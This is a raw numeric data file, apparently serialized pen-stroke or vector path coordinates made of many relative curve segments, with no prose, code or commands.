0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,0-1 0,1 1 0,-1 0 1,1-1-1,0 1 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0-1 0,0 1 0,-1 0 1,1 0-1,0 0 0,0-1 0,0 2 1,30 6 441,13 10-280,-35-16-296,-1 0 0,0 0 0,1-1 0,-1 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,13-2 1,23 0 198,-30 4-127,-12-2-129,-1 1 0,1-1 0,0 1 0,-1-1 1,1 0-1,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,0-1 0,-1 1 1,1-1-1,2 0 0,-3 0-11,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1-1,-1-1 1,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,1-1-7,32-6 39,8 11-47,33-15 333,-75 9-399,6 0 16,-6 1 67,1 0 1,-1 0-1,1 0 1,-1-1 0,1 1-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,0-1-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,-1 0 1,0 0 0,1 1-1,-1-1 1,0 0-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 0-1,1 2 1,-1-1 27,1-1-8,7 0-28,-7 1-106,-1-1 111,0 1 0,0-1 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 1,6 7-2,-6-6 2,0 0 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 1 0,0-1 0,0-1 8,8 3 14,-4 3-10,4-2-14,-7-6 4,-1 2 80,-10 20 112,10 167-109,10-143-91,-10 182 57,-10-195-23,10 79-60,-11-79-18,11 237 32,-4-260 20,3-6-1,1 0 0,-1-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,-1 1-1,1 0 1,0 0 0,-1 0 0,1 0 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 1 1,0 82 149,4-79-145,-4-4-5,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,0 2 0,0-1-9,0 1 33,0-1 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,-1 1 1,0-1-5,2 0-17,0 3-2,0-3-3,0 0-21,0 3 16,0-3 1,-2-2-474,0 1 124,0-1 1,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1-1 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 0 0,0 0-1,0 1 1,1-1 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0-3 0,-8-16-3825,-2 3 538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0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32,'0'0'780,"-13"6"3238,-1 0 756,-1 0-4137,-17 12-334,30-18-9,-9 7 825,11-6-1095,-1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 0 0,-1 1 0,1-1-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,0-1 0,-1 4-22,1 0 0,-1 0 1,1 0-1,0 0 0,0 1 1,0-1-1,0 1 0,1-1 1,-1 1-1,0 5 0,-11 16 31,11-22-37,-1 0-1,1 0 1,0 1 0,1-1 0,-1 0 0,0 1-1,1-1 1,0 1 0,0 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,0 7-1,1-9 6,-1 0 0,1 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1-1 0,0 1 0,0 0-1,1-1 1,-1 1 0,1-1 0,-1 1 0,1-1-1,-1 1 1,1-1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,1 0 0,58 2 129,-51-2-191,42 0 13,-50 0 54,-1-1-3,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1-1 0,9-35 24,-10 35-24,-1-1 1,0 0-1,0 0 0,-1 1 1,1-1-1,-1 0 0,0 1 0,0-1 1,0 0-1,0 1 0,-3-5 1,0-12 27,-3-2 178,6 20-149,-1 0 0,0-1-1,0 1 1,0 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-5-1 0,5 3-62,-1-1-1,1 2 0,0-1 1,0 0-1,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,-2 2 0,-57 21-2933,25-16-4151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0 508,'0'0'2842,"-41"6"3028,15 0-4176,23-4-1625,0 1 1,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,1 0-1,0 0 1,-2 5-1,-8 9 68,11-14-70,0-1-1,0 1 0,1 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,1 0 0,-1-1 1,0 1-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0-1-1,1 1 0,2 4 1,4 4 34,-7-10-99,-1 0 1,1-1-1,-1 1 1,1 0 0,-1 0-1,1 0 1,0 0-1,-1-1 1,1 1-1,0 0 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,-1-1 1,2 1 0,6 1 12,0-1 0,0 1 0,0-2 1,0 1-1,0-1 0,0 0 0,0 0 1,0-1-1,0 0 0,0-1 1,-1 1-1,1-2 0,0 1 0,-1-1 1,1 0-1,-1-1 0,0 1 1,0-2-1,-1 1 0,1-1 0,-1 0 1,10-9-1,-14 10 4,0 1 1,-1-1-1,1 0 0,-1 0 1,0-1-1,0 1 0,0 0 1,0-5-1,-1 7 48,0 0 1,0 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,0 0 0,0 0-1,1 0 1,-1 1-1,0-1 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 1 1,-1 0-1,1-1 1,-1 1-1,0 0 1,-2-2 0,0 1-29,0 0 1,-1 1-1,1-1 1,0 1-1,-1 0 1,1 1-1,0-1 1,-1 1-1,1-1 1,-9 2-1,4 0-109,-1 0 0,1 1 0,0 0 0,-1 0 0,1 1 0,0 0 1,0 0-1,1 1 0,-1 1 0,-15 10 0,4 3-1188,-22 16-8788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2 108,'0'0'1870,"11"-1"616,-11 2-1955,0 42 3906,0 35-2151,4-70-2166,3 7 232,-7-14-222,2 29 687,-1-29-841,0-1 49,0 0 0,-1 0 0,1 1 1,-1-1-1,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 1,0-1-1,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,0 0 0,0 0 0,0 0 112,-2 22 1119,-2-21-1181,5 0 72,2 0-153,-1-1 40,-2 0 398,0-2 83,12-5-263,17-6 90,-15 6-170,20 2-42,-28 3-112,1 0 0,-1 0 1,0 0-1,1 1 0,-1 0 0,0 0 0,1 1 1,-1-1-1,0 1 0,12 4 0,-16-4-14,-1 0 0,1 0-1,0-1 1,-1 1-1,1 0 1,0-1 0,-1 1-1,1-1 1,0 1 0,0-1-1,0 0 1,2 0 0,0 1 16,-1-1 0,1 1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0 0 0,4 2 0,-4-2 14,-1-1 12,21 4 100,-1 1-96,-15-5-50,36-1 268,-41 0-198,39 0 32,13-6 119,-9-7-96,7-10-104,-50 23-24,21-5-45,-16 5 48,-3 4 0,-4-4 0,1 0 1,-1 1 0,0-1-1,1 0 1,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1-1-1,0 1 1,1 0 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1-1-1,0 1 1,1-1 0,4-2 42,13-2 55,-15 4-114,1 0 0,-1-1-1,0 1 1,1 0-1,-1 1 1,1-1-1,-1 0 1,1 1-1,-1 0 1,1 0-1,5 1 1,31 5 22,-39-7-12,-1 0 7,1 1-1,-1-1 0,0 1 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 0,1-1 1,-1 1-1,0 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 1-1,1 0-1,0-1 1,0 1 0,0-1-1,1 0 1,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,1-1 0,-1 1-1,0 0 1,3-2-1,11 0 28,1 5-53,-15-3 86,15 0 110,-15 0-332,6 0 95,-7 0 69,-1 0 1,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1 0 0,-1-1 0,1 1 0,-1 0 0,0-1-1,1 1 1,-1 0 0,0-1 0,0 1 0,1-1 0,-1 1-1,0 0 1,1-1 0,-1 0 10,-8 5-144,8-3 46,-1-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,1 1 1,-1-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,-2 1 1,-63-24-13410,46 18 10277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1 120,'0'0'3684,"22"11"-254,-22-10-3083,1-2-164,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 1 0,1-1-1,-1 0 1,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1-1,-1 0 1,1 0 0,-1 0 0,3 0 0,31-2 2393,-30 2-2386,0-1 0,-1 2 0,1-1 0,0 1 0,0-1 0,-1 1-1,1 0 1,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,4 4 0,0-1-14,-4-3-134,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1-1 0,0 0 0,9 0 0,37 4 378,-48-3-389,0 0-1,0-1 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0-1 1,6-1-1,13-2 117,-18 4-106,1-1-1,0 1 1,-1-1-1,1 0 1,-1-1-1,1 1 1,3-3-1,-6 3-28,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 1,1 1-1,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,3 1 0,-1 0 6,1 0 1,-1 0-1,0 0 0,0-1 0,1 0 1,-1 0-1,10 1 0,72-8 47,-47 12 2,-37-6-61,21 0 105,73-18-31,-66 18-9,-28 0-68,41 0 99,-43 0-100,0-1-1,1 1 1,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,1 1-1,-1-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,-4 4 18,3-5-21,1 0 0,-1 1-1,1-1 1,0 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,0 1 0,-1-1-1,1 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1-1,1-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,-1-1-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1 0,1-1-1,-1 1 1,0 22 13,0-21-11,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1-1,0-1 1,0 1 0,-1-1-1,1 1 1,0 0-1,0-1 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,0 0 0,-2 3-1,3-4 0,-2 23-5,0-3-147,0-19 126,2-1 25,1 0 0,-1 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0-1 1,-1 1-1,1 0 0,0 0 0,0 0 0,0 0 1,0-1-1,-1 1 0,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,0 0 0,-1 0 0,1-1-163,-23-22-9917,14 16 6628,-2 1 17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4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0 482 200,'0'13'15653,"0"-7"-14139,0-1-1195,0-11 891,54-30 443,-26 21-1618,-18 11-44,-1-1 0,0 0 0,0 0 0,-1-1 0,1 0 0,8-9 0,-11 11 45,0 0 1,0 1 0,1 0-1,-1 0 1,1 0 0,0 1-1,-1 0 1,1 0 0,9 0 0,14-6 147,154-48 137,-118 38-459,63-10 90,-116 24 88,0 0-30,0 1 0,1 0 0,-1 1 0,1 0 0,25 1 0,-21-1 1,1-1 0,0-1 0,-1 0 0,0-1 1,0-1-1,33-16 0,35-10 15,-56 22 33,-23 7-61,1 0 1,0 1-1,0-1 0,0 2 1,0-1-1,11 0 1,67-17 21,133-41 10,-180 50-34,-26 6 0,0 1 1,0 1 0,24-3-1,51-7 19,-22 6-24,-44 6 8,1 1-8,-1-1 0,0-1 0,1-2 0,25-5 0,-29 5 14,1 0 0,-1 1 0,1 1 0,0 0 0,-1 2 0,38 6 0,40 0-57,-59-7 23,0 2 0,44 7 0,-1 4 38,-41-7 50,46 12-1,-72-16-10,0-1 0,0 0 0,0 0 0,0-2 0,-1 1 1,18-5-1,29 1 223,-22 3-180,-21-1-56,-1 2 0,1 0 0,0 1-1,27 6 1,-30-5 58,0-1 0,0 0 0,0 0-1,0-2 1,0 0 0,16-3 0,27 0 407,-31 3-383,-13 0-92,0 1 0,-1 1 0,1 0 1,19 4-1,21-1 53,-7-2-91,134 16 53,7 13 770,-17-1 253,-129-27-1057,-37-3-7,0 0 0,0 0 0,0 0-1,-1 1 1,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,5 3-1,34 4 22,-40-6-18,1-1 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0-1 0,4 1 0,13 4 23,-17-4-18,8 0-8,-1 1 0,1 0 0,-1 0 0,1 2 1,-1-1-1,0 1 0,12 7 0,12 2 109,53 13 464,-66-22-509,0 1 0,0 1 0,-1 1 1,29 13-1,-49-16-69,-1-3 8,31 17-25,-9 13 6,-21-29 1,1 0-1,0 1 0,1-1 1,-1 0-1,0 0 0,1 0 1,-1-1-1,1 1 0,-1-1 1,1 1-1,4 1 0,-5-3 27,19 19 164,-19-16-175,0 0-1,0 0 0,1 0 1,-1 0-1,1 0 0,-1-1 0,1 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0 0 0,5 1 0,-1 4 1,-5-5-1,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1-1,1 1 1,3 0 0,9 9 25,-15-9-25,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,1 0 0,0 0-7,32 6 28,-30-7-15,1 8-12,-5-6 16,0 3-5,0-3-6,-45 17-4564,34-15 2560,0-1 0,-1 0 1,1-1-1,0 0 0,-1-1 1,-16-2-1,-4 1-2001,0 1 8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7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22 28,'0'0'115,"0"-1"0,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,7-5 5994,0 7-3757,-6-11 650,-3 18-1695,-9 14-1218,9-21-82,-1 0-1,1-1 1,0 1 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 0 0,-1 3 0,-9 22 33,8-25-40,1 1 1,-1 0 0,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,0 4 1,0-1-1,0 0 0,0-1 0,-1 1 0,0 0 0,-1-1-1,-4 10 1,1-3 2,-44 72-55,46-79 50,1 1 0,0-1 1,0 1-1,1 0 0,-1 0 0,1 0 0,-2 10 0,4-15-8,0 0-1,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,-1 1 1,1-1 12,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,1 1 0,0 0 1,-1 0-1,1-1 0,0 4 1,-10 19 177,9-22-176,-1 0 0,1 1 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,1 0 0,-2 4 0,0-3-3,0 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,-6 3 0,8-6 0,1 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1 0-1,-1 1 1,1-1 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,0 2 0,1-3 19,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,18 1-56,-10-1 170,13-1 25,-16 0-147,1 1 0,-1-1 0,1 1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,6 3 0,-6-2-9,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,12-1 0,-16 0-1,26 1 163,1 2 0,-1 1 0,48 13 0,-30-2-149,29 6 7,-53-15 251,0 2 1,0 0 0,0 0 0,26 17-1,-37-16-35,-23-7-393,-27-8-6175,36 5 3984,-29-5-5397,12 1 3778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26 180,'0'-6'6146,"11"-1"-4853,-11-6 3623,-9 15-2017,7-2-1974,2 0-930,1 0 50,-1 0 0,0-1-1,1 1 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1-1,1 1 1,-1 106 63,-11-82-96,0 25-38,0 21 38,11-63 0,1-5 11,-1-1 0,0 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,0 1 0,0-1-1,1 0 1,-1 0 0,0 0-1,-3 4 1,-7 36 302,9-27-64,2-15-250,0 0-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,-1 1 0,1-1-1,0 0 1,0 0 0,0 1 0,0-1 0,-1 0-1,1 0 1,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 1 0,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,-2 0 113,0 10-2161,-6-14-2621,-4-20-3775,12 17 5002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3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32 540,'22'-31'8129,"-22"34"-6068,0 14 1442,0-12-3343,0 0 1,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,-2 8 0,2-9-138,1-1 1,0 0-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1 3 1,-4 24 51,3-27-47,0-1-1,0 1 1,0-1 0,1 1 0,-1-1-1,1 1 1,0 0 0,0 6 0,1-7 1,-1-1 1,0 1-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,0 0 1,0 0-1,-2 4 1,1 12 261,2-18-276,0-1 0,0 0 1,0 0-1,0 1 0,1-1 0,-1 0 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,0-1 1,-1 0-1,1 0 0,0 1 0,0-1 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 1 0,1-1 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,0 0 0,0 0 185,10-21 416,-8 20-606,1-1-1,-1 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 1,1-3-1,1-2-4,-1 1 0,1-1 0,0 1 0,1-1 0,0 1 0,0 0 0,0 0 0,1 1 0,6-10 0,13-22 6,-18 29-7,0 1 0,1 0 0,0 1 0,0-1 0,1 1 0,0 0 0,0 1 0,0 0 0,1 0 0,10-5 0,-16 9-7,11-1-23,5 3 9,-16 0 19,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,2 5 0,-2-3-6,-1 0-1,0 1 1,0-1-1,-1 0 1,1 1 0,-1-1-1,0 1 1,0 5 0,-1-3-39,0 0 0,0 1 0,0-1 0,-1 0 0,0 0 1,-6 12-1,-3 14-2412,6 3-5116,5-30 4548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26 1024,'-1'-8'6175,"3"-7"-3378,-1 14-2724,-1 1 1,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0-1,-1 0 1,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,7 17 782,-5-15-807,0 0-1,0 0 0,-1 0 0,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 0,0 1 0,0 5 1,6 22 72,-6-26-84,1 0 1,-2 0-1,1 1 1,0-1-1,-1 1 1,0-1-1,0 0 1,-1 1-1,0-1 1,0 1-1,0-1 1,-3 8 0,-2 24 481,4-29-359,-1 1 1,0-1 0,0 0-1,0 0 1,-1 0 0,-1 0-1,1 0 1,-1-1 0,-1 0-1,-10 12 1,7-12 5,-1 0-1,0 0 1,0 0-1,-1-2 1,0 1-1,0-1 1,0-1-1,-18 5 1,3 0-106,19-7-73,1 0 0,-1 0 1,0-1-1,1 0 1,-1-1-1,0 0 0,0 0 1,0 0-1,1 0 1,-1-1-1,0-1 1,-7-1-1,1 0-119,11 3-143,-1-1 0,1 0 1,-1 1-1,1-1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,1-1 0,-4-3 1,3 4-287,1-1 0,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,1-1 0,0 1 1,-1 0-1,1 0 0,0-1 1,0 1-1,1 0 0,-1 0 1,0-1-1,1 1 0,0-2 1,8-9-2584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1756,'0'0'1908,"18"-6"7911,-18 5-9813,0 1-1,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 0,0 1 1,0-1-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,6 15-473,-2-7-2750,-2 9-6400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5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90 1288,'-2'2'8351,"20"4"-6218,-13-5-1978,0 0 1,0 0-1,0 0 1,0-1-1,0 0 1,0 0-1,8-1 1,0-4 381,-1-1 0,0 0-1,16-11 1,-8 4 67,-19 13-582,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 